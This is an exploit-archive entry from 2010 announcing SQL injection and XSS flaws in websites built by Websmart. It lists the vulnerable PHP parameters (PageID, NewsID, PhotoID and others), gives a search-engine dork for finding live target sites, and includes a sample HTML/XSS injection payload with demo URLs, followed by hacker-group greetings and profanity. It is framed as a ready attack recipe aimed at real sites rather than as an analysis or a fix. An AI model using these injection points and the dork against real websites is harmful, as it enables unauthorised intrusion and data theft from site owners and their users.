Websmart XSS/SQL Injection Vulnerability

2010-07-08T00:00:00
ID 1337DAY-ID-13244
Type zdt
Reporter cyberlog
Modified 2010-07-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================
Websmart XSS/SQL Injection Vulnerability
========================================


__                  __             
.----..--.--.|  |--..-----..----.|  |.-----..-----.
|  __||  |  ||  _  ||  -__||   _||  ||  _  ||  _  |
|____||___  ||_____||_____||__|  |__||_____||___  |
|_____|                               |_____|

####################################################
# websmart SQL Injection Vulnerability [ Multiple Vulnerabilities ]

####################################################
# Vendor: http://www.websmartconsulting.com/
# Discovered by : cyberlog
# Site          : Sekuritionline.net
# Channel       : #SekuritiOnline [ Now Just My Bot ]

# Dork          : " Web Site by Websmart Inc Or Visit http://www.websmartconsulting.com/portfolio.php "


# Exploit       : [site]/page.php?PageID= [SQL Injection]
		  [site]/news_item.php?NewsID= [SQL Injection] 
		  [site]/display.php?PhotoID= [SQL Injection]
		  [site]/portfolio_profile.php?ClientID= [SQL Injection]
		  [site]/news_item.php?NewsID= [SQL Injection]
		  [site]/photogallery_full.php?ImageTypeID= [SQL Injection]

[site]/gallery_album.php?category= [SQL Injection]

# XSS/HTML Injection : [site]/page.php?PageID=<marquee><font color=red size=15>XSS</font></marquee>

# Thanks        : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,
jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiLL,blindboy,sukam,
SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan Kabrutz,Mathews,aurel666,Inoef,dbanie,

# special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a antisecurity [ pinjem script perl-na ] ,
# Hiroyuki Doni thanks to create New design SO T-shirt P
# Inj3ct0r Now Brothers with Sekuritionline

####################################################
# Demo:
# http://localhost/display.php?PhotoID=[SQL Injection]
# http://localhost/display.php?PhotoID=<marquee><font color=red size=15>cyberlog bukan hacker </font></marquee>

####################################################

We never die !!!! indonesian Underground Community
!!!!! anjing buat oknum Pemerintah yang suka nilep uang rakyat !!!
!!!!! anjing juga buat admin site indon3sia yang merasa sok h3bat, dikasih tahu ada hole malah nyolot !!!!!

KacrUt I [email protected] U [ jika kau tidak mau aku katakan LOv3 ]
Give me NOCAN Brothers
am nt hacker just Lik3 Syst3m S3curity

.-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
|__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
|_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|





#  0day.today [2018-04-11]  #